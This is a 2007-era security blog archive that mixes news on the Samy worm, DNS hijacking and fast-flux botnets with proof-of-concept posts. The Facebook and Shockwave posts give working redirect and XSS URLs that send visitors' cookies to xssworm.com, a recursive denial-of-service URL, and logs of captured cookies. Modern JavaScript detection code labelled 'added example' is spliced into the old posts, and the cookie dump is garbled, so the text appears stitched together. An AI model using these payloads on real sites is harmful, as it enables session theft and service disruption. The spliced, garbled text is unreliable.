Archive for Social Network Worms

Video: Hacking Myspace - Samy Worm author explains Web 2.0 worms

November 19, 2007 (IDG News Service) — If Samy Kamkar plays his cards right, he may be allowed to visit Myspace again in just a few months. For the time being, however, he’s not even allowed to touch a computer, following a January 2007 guilty plea for creating what many consider to be the first Web 2.0 worm: the Samy worm.

Samy’s worm wasn’t malicious, but it did force News Corp.’s MySpace social-networking site to shut down in late 2005 after forcing more than 1 million users to declare Samy a “hero” on their profile pages.

Last week, Samy, who is now 21, made his first public appearance since his conviction, attending the OWASP App Sec 2007 conference, hosted by eBay in San Jose, California. He was treated like a celebrity at the show, but there were some complications. Under the terms of his plea agreement, he can only use computers for work, so he was forced to show slides that he’d dictated to a friend on a computer that was operated by a conference staffer.

Kamkar: When I wrote the worm, it initially wasn’t a worm. Initially I was just trying to spruce up my MySpace profile. I also wanted to show off to a couple of friends, so I thought ‘wouldn’t it be cool if I did this? [..] As a programmer, it wasn’t too much to learn how to use AJAX, which really helped make the worm work and proliferate really quickly. It only took a few days to write the thing from start to finish and it was only in the last day that I thought that this could be a worm.

(days? *cough*)


Alert: Hackers can take over unused IP Addresses in Highly Trusted domains - Finjan

Domain Name System Hijacked: Hackers Abuse Domain-Name Trust

InternetWorld’s Andy Patrizio and Finjan’s Yuval Ben-Itzhak discuss the fundamental weaknesses in Finjan’s blacklist-based URL filtering products

Using variations on trusted, popular domains has long been a common tactic for scammers, spammers and porn sites. But cyber criminals have devised a new twist on the misspelled domain-name trick by hijacking IP addresses. And they tried it on Yahoo.

To fix the old problem, server-based security products would trace the IP address of the server behind the domain. Once the misspelled domain name had resolved to an IP address, the products would compare that address against a database of known fraudulent sites or questionable locations. So if a site were masquerading as eBay but the filters found it was really a server in China that had been established only one week earlier, they would block access.

Finjan’s Ben-Itzhak on Web 2.0 risks: “Web 2.0 sites are great fun but also a great platform for hackers to host malicious code.” - Ben-Itzhak from Finjan on why his product is still relevant.

In the case of Yahoo, security firm Finjan said hackers exploited an unused IP address within Yahoo’s hierarchy and used that as the domain address behind a forged Google Analytics domain name. This fooled the Finjan Web-filtering product into believing a person was going to a highly trusted Yahoo domain. The victims, customers of Finjan, never knew they were on a malicious Web site, and neither did the security mechanisms on the network. (In this case, Finjan’s Web-filtering product.)

“They managed to resolve the domain name to an IP address owned by Yahoo. How they added an address into a DNS server to appear to be an IP address owned by Yahoo is unknown,” Yuval Ben-Itzhak, CTO of Finjan, told InternetNews.com. He added that Yahoo, while responsive and quick to shut down the compromised address, did not disclose exactly what equipment was behind the compromised IP address.

“You can upload anything you like, so you can upload malicious content, as well.” - Ben-Itzhak on design flaws within Finjan’s product.

Ben-Itzhak thinks something in the server was broken that enabled the bad guys to push that content down to users without Yahoo knowing. He said that’s a flaw in social networks.

“In 2007, something very clear has come out: these Web 2.0 sites are great fun but also a great platform for hackers to host malicious code as well,” said Ben-Itzhak. “You can upload anything you like, so you can upload malicious content, as well. On MySpace we found hundreds of pages with malicious code this year.”

Ben-Itzhak said server-based security is still the primary mode of defense but also recommended browser plug-ins, such as Finjan’s SecureBrowsing or SnakeOil’s HackerExpert, both of which scan the actual content coming over the wire from a site and alert the user if it’s suspicious.

InternetWorld - Hackers Abuse Domain-Name Trust

Finjan RUSafe Typical Product

“With Finjan’s web security there will be no need to worry about getting caught napping by the latest round of web-based threats” - SC Magazine

 

Giorgei Jorge [xssworm] writes:

After explaining that Finjan’s server-based web security filtering products fail to actually inspect web content or protect the user in any significant way .. beyond checking to see if the target domain name is ‘highly trusted’ such as Yahoo.com .. it’s patently clear that this vendor is totally qualified to discuss the emerging threats related to Web 2.0, social networks and distributed passive attacks. It is also clear that Finjan’s server-based products are highly effective, technically advanced, provide enhanced security for your users and in the context of modern web vulnerabilities, are totally relevant and obviously worth the many tens of thousands of dollars that Finjan charges for licensing and support.

To ensure that all web sites are thoroughly tested to ensure that they belong only to “highly trusted domains” such as yahoo.com, it is recommended that users install Finjan’s SecureBrowsing product. SecureBrowsing does not actually check to see if a web site belongs to a highly trusted domain such as yahoo.com, but it does actually inspect some of the content in transit to ensure that only highly trusted domains such as yahoo.com are allowed to install components silently into the browser or take advantage of client vulnerabilities to execute arbitrary code on the user’s desktop. When used in conjunction with the Finjan total security suite of products, including Finjan’s server-based web-filtering product, Finjan’s server and desktop email malware, badware and anti-virus filter scanning products and Finjan’s Instant Messaging to Highly Trusted Domains Like Yahoo.com Only Desktop filtering product, the user can be guaranteed near real-time protection from the most popular and widely reported malicious DNS host names. Security of the Web 2.0 is still somewhat dependent on whether hackers can take over unused IP addresses in Highly Trusted domains - such as yahoo.com - but rest assured that Finjan webgineers are working around the clock to combat these new threats to your information assets.


DNS Fast Fluxing - Are you protected? CA Experts issue warning of new hacker attack

Cybercriminals are increasingly using an advanced method of hiding and sustaining their malicious Websites and botnet infrastructures — dubbed “fast-flux” — that could make them more difficult to detect, researchers say.

DNS Fast Fluxing is also referred to simply as Fast Fluxing, although some advanced security researchers claim Fast Fluxing of services other than Domain Name Services (DNS) may be possible with future developments in attack-and-command botware and crimeware frameworks; in any case, the International Security Convention Consortium (ISCC) will have to convene to consider an appropriate protocol convention for these issues. In the interest of brevity and throughout this article I will generally only make references to “Fast Fluxing” rather than use the long-hand title of DNS Fast Fluxing, and I humbly deign to apologize in advance for any misunderstandings of confusion.

DNS Fast Fluxers, also known as DFFers (or in some circles, FFers) are classed amongst some of the most dangerous of threats to your online assets. DFFers are notorious for defeating anti-phencing systems using flaws within Domain technology such as DNS Services, and for utilizing these flaws to avoid being detected. This makes the DFFer harder to track down completely, as his peer network command is decentralized through the tunnels provided by the popular Internet naming services.

WHAT IS DNS FAST FLUXING?

Fast flux is an advanced method being used by determined botnet operators to hide and preserve their malicious Websites and botnet infrastructures. The bad guys behind Warezov/Stration and Storm, for instance, have separately moved their infrastructures to fast-flux service networks, according to members of the Honeynet Project & Research Alliance, who monitor fast-flux behavior via their honeypots.

What the Fast Flux

 

With Fast Flux, infected bot machines serve as proxies or hosts for malicious Websites and get rotated regularly, changing DNS records to evade discovery. IP blacklists are basically useless in finding fast flux-based botnets. The bad guys behind these networks can easily hide their fake online pharmacies, pornography, phishing sites, and other malicious content servers using this “round-robin” process.

  • Mark Wade

Mark Wade, a 10-year veteran in information security and current manager of Research Content with Computer Associates’ Threat Research Team, and contributor to the Computer Associates Security Advisor Research Blog (CARBS), writes:

“I decided to take a deeper look and see what I could find out about a botnet operation that I stumbled across. This investigation begins from a spammed email message I received, that was selling jewelry.

Since it is common practice, we can assume the email was sent or relayed from a compromised computer that may have been part of a botnet. There were two websites in the email message: http://ryih.mhhimto.com and rmfx.mhhimto.com.

Using nslookup, I entered rmfx.mhhimto.com to resolve its IP address. I was not surprised to see eight completely different IP addresses returned, all from various IP netblocks. Since I have seen similar types of activity in the past, I ran nslookup again to see if the IP addresses changed. Sure enough, in just under 10 minutes the previously listed IP addresses changed to a completely new set of IP addresses. This seemed to happen about every ten minutes. I quickly identified the ever-changing IP addresses as DNS fast fluxing.

Fast fluxing is a method of deception utilized by botnets to conceal the identity of the bot herder or parts of the criminal activity. Fast fluxing works by constantly rotating compromised IP addresses, which are usually acting as a proxy to the end system. This is extremely beneficial to criminals who are involved in phishing scams or using compromised web sites used to deliver malware.”

  • The Honeynet Project

The Honeynet Project & Research Alliance defines a fast-flux network as:

Fast-flux service networks are a network of compromised computer systems with public DNS records that are constantly changing, in some cases every few minutes. These constantly changing architectures make it much more difficult to track down criminal activities and shut down their operations.

  • Adam O’Donnell of Cloudmark

“The purpose of this technique is to render the IP-based block list — a popular tool for identifying malicious systems — useless for preventing attacks,” says Adam O’Donnell, director of emerging technologies at security vendor Cloudmark.

“Fast flux is just the latest method of survival for the bad guys: There are more to come. Any technique that allows a malicious actor to keep his network online longer — and reduce the probability of his messages and attacks being blocked — will be used,” he says. “This is just the latest of those techniques.”

  • Ralph Logan, The Logan Group

“All of this research on fast-flux is new. No one had any definitive research on it. [..] We saw a rising trend in illegal, malicious criminal activity here.. [..] Fast-flux helps cybercriminals hide their content servers, including everything from fake online pharmacies, phishing sites, money mules, and adult content sites,” Logan says. “This is to keep security professionals and ISPs from discovering and mitigating their illegal content.”

The bad guys like fast-flux — not only because it keeps them up and running, but also because it’s more efficient than traditional methods of infecting multiple machines, which were easily discovered.

“The ISP would shut down my 100 machines, and then I’d have to infect 100 more to serve my content and relay my spam,” Logan says. Fast-flux, however, lets hackers set up proxy servers that contact the “mother ship,” which serves as command and control. It uses an extra layer of obfuscation between the victim (client) and the content machine, he says.

“Our honeypot can capture actual traffic between the mother ship and the end node,” Logan says. The Alliance is still studying the malicious code and behavior of the fast-flux network it has baited.

A domain has hundreds or thousands of IP addresses, all of which are rotated frequently — so the proxy machines get rotated regularly, too – some as often as every three minutes — to avoid detection. “It’s not a bunch of traffic to one node serving illegal code,” Logan says.

“I send you a phishing email, you click on www.homepharmacy.com — but it’s really taking you to Grandma’s PC on PacBell! .. Which wakes up and says ‘it’s my turn now!’” threatens Logan. “You’d have 100 different users coming to Grandma’s PC for the next few minutes, and then Auntie Flo’s PC gets command-and-controlled next!” he says, with a menacing tone.
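To make Wade’s nslookup observation and the Honeynet definition above concrete, here is an added example (my code, not CA’s or the Honeynet Project’s) that runs a simple fast-flux heuristic over a constructed series of resolver answers, the kind of data you collect by re-running nslookup every ten minutes as Wade did. The sample answers, the “/16 as netblock” shortcut and the thresholds are assumptions for illustration; a production check would add ASN lookups and TTL history, which need network access, and would not rely on any single cutoff.

```javascript
// Added example, not code from the CA or Honeynet write-ups. Each
// observation mimics one nslookup run: the probe time, the A records
// returned, and their TTL. Thresholds below are assumptions for illustration.

// Constructed sample: eight addresses from unrelated netblocks, and the
// whole set is swapped every ten minutes (the fast-flux pattern).
const FLUX_OBSERVATIONS = [
  { minute: 0,  ttl: 300, ips: ['24.16.7.2', '68.33.101.9', '81.170.3.44', '190.21.8.17', '122.167.4.3', '59.93.50.1', '201.19.66.8', '85.140.9.12'] },
  { minute: 10, ttl: 300, ips: ['71.55.3.100', '99.230.8.4', '213.87.12.5', '189.41.0.77', '117.200.3.9', '61.95.1.230', '200.75.4.6', '95.24.7.19'] },
  { minute: 20, ttl: 300, ips: ['98.201.6.3', '75.69.44.1', '77.252.9.8', '186.18.5.40', '114.79.2.11', '58.174.6.2', '190.80.3.5', '91.77.1.66'] },
];

// Constructed sample: a content-delivery style name with three stable
// addresses in two /16s, returned in rotating (round-robin) order.
const CDN_OBSERVATIONS = [
  { minute: 0,  ttl: 60, ips: ['203.0.113.10', '203.0.113.11', '198.51.100.5'] },
  { minute: 10, ttl: 60, ips: ['203.0.113.11', '198.51.100.5', '203.0.113.10'] },
  { minute: 20, ttl: 60, ips: ['198.51.100.5', '203.0.113.10', '203.0.113.11'] },
];

// Assumption: treat the first two octets as "the netblock". Real code would
// map each address to its ASN instead.
function slash16(ip) {
  return ip.split('.').slice(0, 2).join('.');
}

// Summarise churn across the observations: distinct addresses seen, the
// fraction of answers after the first probe that were never seen before,
// how many /16s the addresses span, and the lowest TTL returned.
function fluxStats(observations) {
  const seen = new Set();
  const blocks = new Set();
  let answerCount = 0;
  let newCount = 0;
  for (const obs of observations) {
    for (const ip of obs.ips) {
      answerCount += 1;
      if (!seen.has(ip)) { newCount += 1; seen.add(ip); }
      blocks.add(slash16(ip));
    }
  }
  const firstAnswer = observations[0].ips.length;
  const turnover = answerCount > firstAnswer
    ? (newCount - firstAnswer) / (answerCount - firstAnswer)
    : 0;
  const minTtl = Math.min(...observations.map(o => o.ttl));
  return { distinctIps: seen.size, turnover, netblocks: blocks.size, minTtl };
}

// Assumed thresholds: near-total replacement of the answer set between
// probes, addresses spread over many unrelated netblocks, and a TTL short
// enough for that rotation to take effect at clients.
function isFastFlux(observations) {
  const s = fluxStats(observations);
  return s.turnover >= 0.8 && s.netblocks >= 6 && s.minTtl <= 600;
}

function classify(label, observations) {
  return `${label}: ${isFastFlux(observations) ? 'fast-flux' : 'normal'} ${JSON.stringify(fluxStats(observations))}`;
}

console.log(classify('rmfx-like name', FLUX_OBSERVATIONS));
console.log(classify('cdn-like name', CDN_OBSERVATIONS));
```

The CDN sample is there to show why churn alone is not enough: round-robin answers reorder the same few addresses, so the turnover stays at zero even though every probe looks “different” at a glance.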

Sources:

http://community.ca.com/blogs/securityadvisor/archive/2007/11/07/web-of-deception.aspx

http://www.darkreading.com/document.asp?doc_id=132720


Facebook 0day exploit in share redirect and JAR: protocol

Click here to send your facebook cookies to xssworm (-;

http://www.facebook.com/share_redirect.php?h=fef648d6fe6177edfa9ff58e779a83&url=http%3A%2F%2Fwww.facebook.com%2Fshare_redirect.php%3Fh%3D0%26url%3Dhttp%3A%2F%2Fxssworm.com&sid=6330305874

Can we upload a JPG with a JAR injected into it, or chain a second pass of the redirect bug? Facebook now allows embedding of MP3s and other items through share bookmarks:

javascript:var d=document,f='http://www.facebook.com/share',l=d.location,e=encodeURIComponent,p='.php?src=bm&v=4&i=1182484661&u='+e(l.href)+'&t='+e(d.title);1;try{if(!/^(.*\.)?facebook\.[^.]*$/.test(l.host))throw(0);share_internal_bookmarklet(p)}catch(z){a=function(){if(!window.open(f+'r'+p,'sharer','toolbar=0,status=0,resizable=0,width=626,height=436'))l.href=f+p};if(/Firefox/.test(navigator.userAgent))setTimeout(a,0);else{a()}}void(0)

Facebook has many holes like this.

vaj.
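An added example, not Facebook’s code, showing why a host-only check on a redirect target is beaten by the chained URL above. The outer share_redirect target is on facebook.com, so a policy that only inspects the immediate target lets it through; the inner hop (h=0, url=xssworm.com) is where the visitor actually lands. The page does not say what the h= parameter validates, so the two policy functions, and the assumption that h only binds the immediate target, are mine.

```javascript
// Added example, not Facebook's code. CHAINED is the URL quoted in the post.
// Assumption: h= is a token that covers only the immediate url= value, so a
// chain whose outer hop is "valid" and whose inner hop is unchecked gets through.

const CHAINED = 'http://www.facebook.com/share_redirect.php?h=fef648d6fe6177edfa9ff58e779a83'
  + '&url=http%3A%2F%2Fwww.facebook.com%2Fshare_redirect.php%3Fh%3D0%26url%3Dhttp%3A%2F%2Fxssworm.com'
  + '&sid=6330305874';

const SITE_HOST = 'www.facebook.com';
const REDIRECTOR_PATH = '/share_redirect.php';

// The url= parameter of a redirector URL, resolved against it, or null.
function targetOf(redirectUrl) {
  const u = new URL(redirectUrl);
  const raw = u.searchParams.get('url');
  return raw ? new URL(raw, u) : null;
}

// Naive policy: the immediate target only has to live on our own host.
function naiveAllows(redirectUrl) {
  const t = targetOf(redirectUrl);
  return t !== null && t.hostname === SITE_HOST;
}

// Hardened policy: unwind any url= chain that stays inside our own
// redirector (no requests are made), cap the depth, and judge where the
// visitor finally ends up.
function finalDestination(redirectUrl, maxHops = 5) {
  let current = new URL(redirectUrl);
  for (let hop = 0; hop < maxHops; hop++) {
    const target = targetOf(current.href);
    if (target === null) return current;
    if (target.hostname === SITE_HOST && target.pathname === REDIRECTOR_PATH) {
      current = target; // another bounce through the redirector: keep going
      continue;
    }
    return target;
  }
  return null; // too deep: treat as unsafe
}

function hardenedAllows(redirectUrl) {
  const dest = finalDestination(redirectUrl);
  return dest !== null && dest.hostname === SITE_HOST && dest.pathname !== REDIRECTOR_PATH;
}

console.log('naive:', naiveAllows(CHAINED), 'hardened:', hardenedAllows(CHAINED),
  'lands on:', finalDestination(CHAINED).hostname);
```

The unwinding is the part that matters: any check that signs or allowlists only the next hop is defeated as soon as the next hop is itself a redirector with a weaker check, which is exactly the shape of the h=0 inner URL.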


Zero Day Shockwave SWF Player Exploit with XSS Attack

Here we have some proof-of-concept demonstrations of XSS attacks and cross-site Flash forgery on several sites.

We hope our readers will leave some feedback on these serious vulnerabilities.

SWF Exploit 1.)

We point the browser at the target Shockwave player:

http://alanakurtis.com/flash/musicplayer.swf?song_url=http://localhost/xssworm/&autoplay=true

and on localhost the following request arrives:

Connect to [127.0.0.1] from localhost [127.0.0.1] 4131
GET /xssworm/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows ME; en-US; rv:1.3.3.8) Firefox/2.0.0.0–snip–
Keep-Alive: 300
Connection: keep-alive

..

(-;

A possible blackhat attack to deny service to the server’s users, by pointing the player’s song_url back at itself: host/flash/musicplayer.swf?song_url=host/flash/musicplayer.swf?song_url=host/flash/musicplayer.swf?song_url=/flash/musicplayer.swf?song_url=/flash/musicplayer.swf?song_url=/flash/musicplayer.swf?song_url=/flash/musicplayer.swf?song_url=/flash/musicplayer.swf?song_url=xssworm.com

Likewise, the browser requests:

http://www.moanmyip.com/player.swf?song_url=http://localhost/xssworm?seo&autoplay=true

but in the logger we see:

Connect to [127.0.0.1] from localhost [127.0.0.1] 3831
GET /xssworm?seo HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows ME; en-US; rv:1.3.3.8) Firefox/2.0.0.0–snip–
Keep-Alive: 300
Connection: keep-alive

And while hacking on Metacafe we discover a Shockwave XSS 0-day that a blackhat could use to steal fish:

MetaCafe XSS Worm Vulnerability - 0-Day Shockwave Attack POC

Demo:

http://www.metacafe.com/f/fvp/EmbedVideoPlayer_5.1.0.0.swf?itemID=755028&mediaURL=http://xssworm.com/?fish&normalizedTitle=space_trip&isViral=false&isWatermarked=false&postrollContentURL=http://l3images.metacafe.com/f/fvp/EmbedItemSelector_3.0.0.5.swf&networkingAllowed=true&

We see this logged at xssworm.com:
GET /crossdomain.xml HTTP/1.1
Host: metacafe.122.2o7.net
… snips…
Connection: keep-alive
Cookie: s_vi_xxhybx7BxBxxclx7Fx7D=[CS]v4|472A0D2D00060B2-290B2900004DB|472A0
D2D[CE]; s_vihfex7Ekx7Dx7Fzxx=[CS]v4|47208A0C00004D74-A170C5400003A87|472DA4DB[
CE]; s_vi_jdghjlgdijg=[CS]v4|472605E00007606-A170BAE000039DC|4726056DCE] s_vi
_wzvqcdsx7F7×60qx7isx7Fx7D=[CS]v4|473350E200004A7E-A000C800004398|473350E2[C
E]; s_vi_zox7Ekigx7Ex7De=[CS]v|47009D8E00027B7-A000B0400000F80|400A7C4[CE];
s_vi_kefx7Dhxxkdn=[CS]v4|4707E570000074C7-A1606500003648|47200DA4DB[CE]; s_vi_jd
ghjfxxliyo=[CS]v4|4726056E0000760-A00070BAE000039DC|4726056[CE]; svi_nyhylx7B89
x3E=[CS]v4|46FEC0DF0004AB3-A00B28000180|46FEC0D[CE]; s_vi_hfedldmx0×7B=[CS
]v4|4725839500005A8F-A160B1700007C|472605EC[CE]; s_vi_x7Dx6067zbhx7Dl=[CS]v4|4
6FEC0C4000077C6-A160B2100003DDF|4EC4EC0C4[CE]; s_vi_ox7Dyhex700Ffnoxx=[C]v4|4FEC0
BC00003E04-A000B000075F|46C0BBCE]; s_vi_pogx7F4k=[CS]v7208C000DB-A
290B5A000015EB|47208C61[CE]; s_vi_igdx7Fxxiae=[CS]v4|47225ED8000044DD-A140A36000
02900|47225ED7[CE]; s_vi_brcxxaabctrxxatkppc=[CS]v4|4709002200006037-A290A9D0000
6E2E|4717A488[CE]; s_vi_kefx7Dhndfyx7B=[CS]v4|470EE04300002808-A140A2500000049|4
70EE043[CE]; s_vi_chsts003DBF|4734B658[CE]; s_vi_svx7Cywxxdsux7Edbuqe=[CS]v4|47351D–

snips…

We see many more serious vulnerabilities in Web 2.0 today.

Hacker browses: http://www.liveleak.com/player.swf?song_url=http://localhost/hurr&autoplay=true

In the server log:

connect to [127.0.0.1] from localhost [127.0.0.1] 1268
GET /urchin.js HTTP/1.1
Host: www.google-analytics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;)
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.liveleak.com/

(;

Please leave nice XSS comments.
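An added example, not code from any of the players or sites above: a static audit of SWF embed URLs whose flashvars name a resource the player will go and fetch. It flags loader parameters that point off the player’s own site and player URLs that recurse into themselves, the two patterns shown in this post. SAMPLES are the URLs quoted above (the recursive one rewritten with a scheme and host so it parses); the LOADER_PARAMS list and the crude same-site rule are my assumptions.

```javascript
// Added example, not code from the players or sites in the post.
// Assumption: these flashvars are the ones the players treat as URLs to load.
const LOADER_PARAMS = ['song_url', 'mediaURL', 'postrollContentURL'];

// URLs quoted in the post; "recursive" is constructed from the
// "host/flash/musicplayer.swf?song_url=..." chain so that it parses.
const SAMPLES = {
  alanakurtis: 'http://alanakurtis.com/flash/musicplayer.swf?song_url=http://localhost/xssworm/&autoplay=true',
  metacafe: 'http://www.metacafe.com/f/fvp/EmbedVideoPlayer_5.1.0.0.swf?itemID=755028&mediaURL=http://xssworm.com/?fish&normalizedTitle=space_trip&isViral=false&isWatermarked=false&postrollContentURL=http://l3images.metacafe.com/f/fvp/EmbedItemSelector_3.0.0.5.swf&networkingAllowed=true&',
  recursive: 'http://alanakurtis.com/flash/musicplayer.swf?song_url=http://alanakurtis.com/flash/musicplayer.swf?song_url=/flash/musicplayer.swf?song_url=http://xssworm.com',
};

function parseMaybe(value, base) {
  try { return new URL(value, base); } catch (e) { return null; }
}

// Crude registrable-domain check (assumption): compare the last two labels,
// so l3images.metacafe.com and www.metacafe.com count as one site. Real code
// needs a public-suffix list (co.uk and friends).
function sameSite(a, b) {
  const tail = h => h.split('.').slice(-2).join('.');
  return tail(a.hostname) === tail(b.hostname);
}

// Returns a list of findings for a .swf URL, or null if the URL is not a
// player we can judge. Nothing is fetched; this is purely a string audit.
function auditSwfUrl(swfUrl) {
  const u = parseMaybe(swfUrl);
  if (u === null || !u.pathname.toLowerCase().endsWith('.swf')) return null;
  const findings = [];
  for (const name of LOADER_PARAMS) {
    for (const raw of u.searchParams.getAll(name)) {
      const target = parseMaybe(raw, u);
      if (target !== null && !sameSite(target, u)) {
        findings.push({ kind: 'off-site-load', param: name, target: target.href });
      }
    }
  }
  // Self-recursion: how often the player's own path reappears inside its
  // query string (the denial-of-service variant in the post).
  const depth = u.search.split(u.pathname).length - 1;
  if (depth > 0) findings.push({ kind: 'self-recursion', param: null, depth });
  return findings;
}

for (const [label, url] of Object.entries(SAMPLES)) {
  console.log(label, JSON.stringify(auditSwfUrl(url)));
}
```

The recursive sample only trips the self-recursion rule because every hop is same-site until the innermost one; a player that actually follows the chain still ends up loading xssworm.com, which is why the audit reports recursion at all rather than just checking the first hop.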


Security Experts Warn of Web 2.0 Woes : XSS and AJAX Hacking Attacks

While Web 2.0 applications might be all the rage for developers and increasingly important in the enterprise, security experts warn they represent a serious threat — a fact that won’t change until businesses start demanding greater protections.

That was the theme at the New New Internet conference here yesterday, where a panel of security experts told audience members that Web 2.0 application developers lack tools to secure their applications, creating a problem unlikely to be fixed without greater prompting by IT management.

“Beat up on your vendors and your own developers,” said Steve Orrin, director of security solutions for Intel Corp. “Look for and ask for security features in your applications. Until you start asking, they aren’t going to see it as a requirement.”

Much of the issue stems from the fact that underlying technologies being used in new Web applications and Web services were never properly secured to begin with, panelists said.

“We’ve already moved on and started to look at Web 2.0 technology, when Web 1.0 wasn’t secure yet,” Orrin said.

“By networking with code-writing peers and hearing lectures by security experts,” he said, “hackers can gather the truth: information necessary to build safer systems and to push for better security.”

Steve Orrin: “Cross-Site Scripting is much more powerful when used in a Web 2.0 environment”

“What we’re seeing is advanced uses of the same sorts of attacks that were used before.” Cross-site scripting, for example, is “much more powerful” when used in a Web 2.0 environment, he suggested. “As powerful a tool as Web 2.0 technology is for developers and users, it’s even more so for attackers.”

That’s especially true of things like phishing attacks, Orrin said.

Steve Orrin: “It’s become a lot easier to trick users with Web 2.0 — the automation is to the point where the user doesn’t even have to be involved for the attack to occur.”

Hart Rossman, chief security technologist at research and engineering giant Science Applications International Corporation (SAIC), agreed. He pointed to the difficulties that security professionals face in checking some Web 2.0 applications for vulnerabilities. “AJAX is the weapon of choice for sex appeal, but current vulnerability assessment tools have trouble traversing AJAX sites, and it’s harder to find the vulnerabilities,” Rossman said. “You can’t recreate sessions as easily, so if something happens, it’s very difficult to create the forensics to analyze it.”

Hart Rossman: “AJAX is the weapon of choice for sex appeal.”

Rossman added that the rise of the use of widgets and other outside components on sites raises the specter of people using “Web 2.0 on top of Web 2.0″ to mount large cross-network attacks.

Experts such as Rossman are currently focusing their efforts on determining a suitably scary-sounding name for these new and unprotected (and potentially devastating to your e-business) Web 2.0 on top of Web 2.0 attack worms.

Hart Rossman: “People tend not to trust the mash-up developer.. they trust the API provider. There’s very little thought given to the mash-up, or the mash-up on top of the mash-up.”

News Link : http://www.internetnews.com/dev-news/article.php/3708876
